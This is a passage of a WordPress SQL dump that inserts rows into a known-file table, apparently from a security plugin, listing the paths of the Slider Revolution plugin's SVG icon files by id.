(2400, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_20_24px.svg'),
(2401, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_30_24px.svg'),
(2402, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_50_24px.svg'),
(2403, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_60_24px.svg'),
(2404, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_80_24px.svg'),
(2405, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_90_24px.svg'),
(2406, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_full_24px.svg'),
(2407, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_full_24px.svg'),
(2408, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_std_24px.svg'),
(2409, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_unknown_24px.svg'),
(2410, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_24px.svg'),
(2411, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_connected_24px.svg'),
(2412, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_disabled_24px.svg'),
(2413, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_searching_24px.svg'),
(2414, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_auto_24px.svg'),
(2415, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_high_24px.svg'),
(2416, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_low_24px.svg'),
(2417, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_medium_24px.svg'),
(2418, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_data_usage_24px.svg'),
(2419, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_developer_mode_24px.svg'),
(2420, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_devices_24px.svg'),
(2421, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_dvr_24px.svg'),
(2422, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_fixed_24px.svg'),
(2423, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_not_fixed_24px.svg'),
(2424, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_off_24px.svg'),
(2425, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_graphic_eq_24px.svg'),
(2426, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_disabled_24px.svg'),
(2427, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_searching_24px.svg'),
(2428, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_cell_24px.svg'),
(2429, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_wifi_24px.svg'),
(2430, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_nfc_24px.svg'),
(2431, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_landscape_24px.svg'),
(2432, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_portrait_24px.svg'),
(2433, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_rotation_24px.svg'),
(2434, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_rotation_24px.svg'),
(2435, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_sd_storage_24px.svg'),
(2436, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_settings_system_daydream_24px.svg'),
(2437, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_0_bar_24px.svg'),
(2438, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_1_bar_24px.svg'),
(2439, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_2_bar_24px.svg'),
(2440, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_3_bar_24px.svg'),
(2441, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_4_bar_24px.svg'),
(2442, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_0_bar_24px.svg'),
(2443, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_1_bar_24px.svg'),
(2444, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_2_bar_24px.svg'),
(2445, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_3_bar_24px.svg'),
(2446, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_4_bar_24px.svg'),
(2447, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_no_sim_24px.svg'),
(2448, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_null_24px.svg'),
(2449, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_off_24px.svg'),
(2450, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_0_bar_24px.svg'),
(2451, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_24px.svg'),
(2452, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_lock_24px.svg'),
(2453, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_24px.svg'),
(2454, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_lock_24px.svg'),
(2455, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_24px.svg'),
(2456, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_lock_24px.svg'),
(2457, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_24px.svg'),
(2458, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_lock_24px.svg'),
(2459, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_off_24px.svg'),
(2460, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_1_bar_26x24px.svg'),
(2461, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_2_bar_26x24px.svg'),
(2462, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_3_bar_26x24px.svg'),
(2463, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_4_bar_26x24px.svg'),
(2464, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_1_26x24px.svg'),
(2465, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_26x24px.svg'),
(2466, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_2_26x24px.svg'),
(2467, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_3_26x24px.svg'),
(2468, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_4_26x24px.svg'),
(2469, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_not_connected_26x24px.svg'),
(2470, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_null_26x24px.svg'),
(2471, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_storage_24px.svg'),
(2472, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_usb_24px.svg'),
(2473, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wallpaper_24px.svg'),
(2474, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_widgets_24px.svg'),
(2475, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wifi_lock_24px.svg'),
(2476, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wifi_tethering_24px.svg'),
(2477, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_attach_file_24px.svg'),
(2478, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_attach_money_24px.svg'),
(2479, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_all_24px.svg'),
(2480, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_bottom_24px.svg'),
(2481, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_clear_24px.svg'),
(2482, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_color_24px.svg'),
(2483, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_horizontal_24px.svg'),
(2484, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_inner_24px.svg'),
(2485, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_left_24px.svg'),
(2486, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_outer_24px.svg'),
(2487, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_right_24px.svg'),
(2488, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_style_24px.svg'),
(2489, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_top_24px.svg'),
(2490, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_vertical_24px.svg'),
(2491, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_drag_handle_24px.svg'),
(2492, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_center_24px.svg'),
(2493, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_justify_24px.svg'),
(2494, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_left_24px.svg'),
(2495, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_right_24px.svg'),
(2496, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_bold_24px.svg'),
(2497, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_clear_24px.svg'),
(2498, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_fill_24px.svg'),
(2499, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_reset_24px.svg'),
(2500, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_text_24px.svg'),
(2501, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_indent_decrease_24px.svg'),
(2502, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_indent_increase_24px.svg'),
(2503, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_italic_24px.svg'),
(2504, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_line_spacing_24px.svg'),
(2505, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_bulleted_24px.svg'),
(2506, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_numbered_24px.svg'),
(2507, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_paint_24px.svg'),
(2508, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_quote_24px.svg'),
(2509, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_shapes_24px.svg'),
(2510, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_size_24px.svg'),
(2511, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_strikethrough_24px.svg'),
(2512, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_textdirection_l_to_r_24px.svg'),
(2513, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_textdirection_r_to_l_24px.svg'),
(2514, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_underlined_24px.svg'),
(2515, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_functions_24px.svg'),
(2516, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_highlight_24px.svg'),
(2517, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_chart_24px.svg'),
(2518, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_comment_24px.svg'),
(2519, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_drive_file_24px.svg'),
(2520, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_emoticon_24px.svg'),
(2521, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_invitation_24px.svg'),
(2522, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_link_24px.svg'),
(2523, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_photo_24px.svg'),
(2524, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_linear_scale_24px.svg'),
(2525, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_merge_type_24px.svg'),
(2526, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_comment_24px.svg'),
(2527, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_edit_24px.svg'),
(2528, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_money_off_24px.svg'),
(2529, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_publish_24px.svg'),
(2530, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_short_text_24px.svg'),
(2531, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_space_bar_24px.svg'),
(2532, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_strikethrough_s_24px.svg'),
(2533, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_text_fields_24px.svg'),
(2534, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_bottom_24px.svg'),
(2535, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_center_24px.svg'),
(2536, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_top_24px.svg'),
(2537, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_wrap_text_24px.svg'),
(2538, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_attachment_24px.svg'),
(2539, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_24px.svg'),
(2540, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_circle_24px.svg'),
(2541, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_done_24px.svg'),
(2542, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_download_24px.svg'),
(2543, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_off_24px.svg'),
(2544, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_queue_24px.svg'),
(2545, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_upload_24px.svg'),
(2546, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_create_new_folder_24px.svg'),
(2547, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_file_download_24px.svg'),
(2548, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_file_upload_24px.svg'),
(2549, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_24px.svg'),
(2550, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_open_24px.svg'),
(2551, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_shared_24px.svg'),
(2552, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_24px.svg'),
(2553, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_connected_24px.svg'),
(2554, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_computer_24px.svg'),
(2555, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_desktop_mac_24px.svg'),
(2556, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_desktop_windows_24px.svg'),
(2557, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_developer_board_24px.svg');
INSERT INTO `zdenl_wfknownfilelist` (`id`, `path`) VALUES
(2558, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_device_hub_24px.svg'),
(2559, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_devices_other_24px.svg'),
(2560, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_dock_24px.svg'),
(2561, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_gamepad_24px.svg'),
(2562, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_24px.svg'),
(2563, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_mic_24px.svg'),
(2564, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_24px.svg'),
(2565, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_down_24px.svg'),
(2566, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_left_24px.svg'),
(2567, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_right_24px.svg'),
(2568, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_up_24px.svg'),
(2569, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_backspace_24px.svg'),
(2570, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_capslock_24px.svg'),
(2571, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_hide_24px.svg'),
(2572, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_return_24px.svg'),
(2573, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_tab_24px.svg'),
(2574, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_voice_24px.svg'),
(2575, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_24px.svg'),
(2576, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_chromebook_24px.svg'),
(2577, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_mac_24px.svg'),
(2578, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_windows_24px.svg'),
(2579, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_memory_24px.svg'),
(2580, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_mouse_24px.svg'),
(2581, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phone_android_24px.svg'),
(2582, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phone_iphone_24px.svg'),
(2583, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_24px.svg'),
(2584, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_off_24px.svg'),
(2585, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_power_input_24px.svg'),
(2586, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_router_24px.svg'),
(2587, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_scanner_24px.svg'),
(2588, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_security_24px.svg'),
(2589, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_sim_card_24px.svg'),
(2590, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_smartphone_24px.svg'),
(2591, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_24px.svg'),
(2592, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_group_24px.svg'),
(2593, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_24px.svg'),
(2594, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_android_24px.svg'),
(2595, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_mac_24px.svg'),
(2596, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_toys_24px.svg'),
(2597, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tv_24px.svg'),
(2598, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_videogame_asset_24px.svg'),
(2599, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_watch_24px.svg'),
(2600, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_add_a_photo_24px.svg'),
(2601, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_add_to_photos_24px.svg'),
(2602, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_adjust_24px.svg'),
(2603, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_24px.svg'),
(2604, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_photo_24px.svg'),
(2605, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_audiotrack_24px.svg'),
(2606, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_circular_24px.svg'),
(2607, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_linear_24px.svg'),
(2608, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_off_24px.svg'),
(2609, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_on_24px.svg'),
(2610, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_1_24px.svg'),
(2611, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_2_24px.svg'),
(2612, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_3_24px.svg'),
(2613, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_4_24px.svg'),
(2614, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_5_24px.svg'),
(2615, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_6_24px.svg'),
(2616, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_7_24px.svg'),
(2617, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_broken_image_24px.svg'),
(2618, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brush_24px.svg'),
(2619, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_24px.svg'),
(2620, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_alt_24px.svg'),
(2621, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_front_24px.svg'),
(2622, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_rear_24px.svg'),
(2623, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_roll_24px.svg'),
(2624, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_center_focus_strong_24px.svg'),
(2625, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_center_focus_weak_24px.svg'),
(2626, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_collections_24px.svg'),
(2627, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_collections_bookmark_24px.svg'),
(2628, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_color_lens_24px.svg'),
(2629, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_colorize_24px.svg'),
(2630, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_compare_24px.svg'),
(2631, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_control_point_24px.svg'),
(2632, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_control_point_duplicate_24px.svg'),
(2633, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_16_9_24px.svg'),
(2634, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_24px.svg'),
(2635, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_3_2_24px.svg'),
(2636, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_5_4_24px.svg'),
(2637, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_7_5_24px.svg'),
(2638, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_din_24px.svg'),
(2639, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_free_24px.svg'),
(2640, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_landscape_24px.svg'),
(2641, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_original_24px.svg'),
(2642, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_portrait_24px.svg'),
(2643, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_rotate_24px.svg'),
(2644, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_square_24px.svg'),
(2645, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_dehaze_24px.svg'),
(2646, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_details_24px.svg'),
(2647, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_edit_24px.svg'),
(2648, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_24px.svg'),
(2649, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_neg_2_24px.svg'),
(2650, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_plus_1_24px.svg'),
(2651, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_plus_2_24px.svg'),
(2652, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_zero_24px.svg'),
(2653, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_1_24px.svg'),
(2654, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_24px.svg'),
(2655, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_2_24px.svg'),
(2656, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_3_24px.svg'),
(2657, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_4_24px.svg'),
(2658, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_5_24px.svg'),
(2659, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_6_24px.svg'),
(2660, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_7_24px.svg'),
(2661, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_8_24px.svg'),
(2662, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_9_24px.svg'),
(2663, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_9_plus_24px.svg'),
(2664, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_b_and_w_24px.svg'),
(2665, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_center_focus_24px.svg'),
(2666, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_drama_24px.svg'),
(2667, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_frames_24px.svg'),
(2668, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_hdr_24px.svg'),
(2669, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_none_24px.svg'),
(2670, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_tilt_shift_24px.svg'),
(2671, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_vintage_24px.svg'),
(2672, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flare_24px.svg'),
(2673, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flash_auto_24px.svg'),
(2674, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flash_off_24px.svg'),
(2675, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flash_on_24px.svg'),
(2676, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flip_24px.svg'),
(2677, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_gradient_24px.svg'),
(2678, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grain_24px.svg'),
(2679, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_off_24px.svg'),
(2680, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_on_24px.svg'),
(2681, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_off_24px.svg'),
(2682, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_on_24px.svg'),
(2683, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_strong_24px.svg'),
(2684, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_weak_24px.svg'),
(2685, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_healing_24px.svg'),
(2686, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_image_24px.svg'),
(2687, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_image_aspect_ratio_24px.svg'),
(2688, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_iso_24px.svg'),
(2689, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_landscape_24px.svg'),
(2690, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_add_24px.svg'),
(2691, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_remove_24px.svg'),
(2692, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_lens_24px.svg'),
(2693, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_linked_camera_24px.svg'),
(2694, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_24px.svg'),
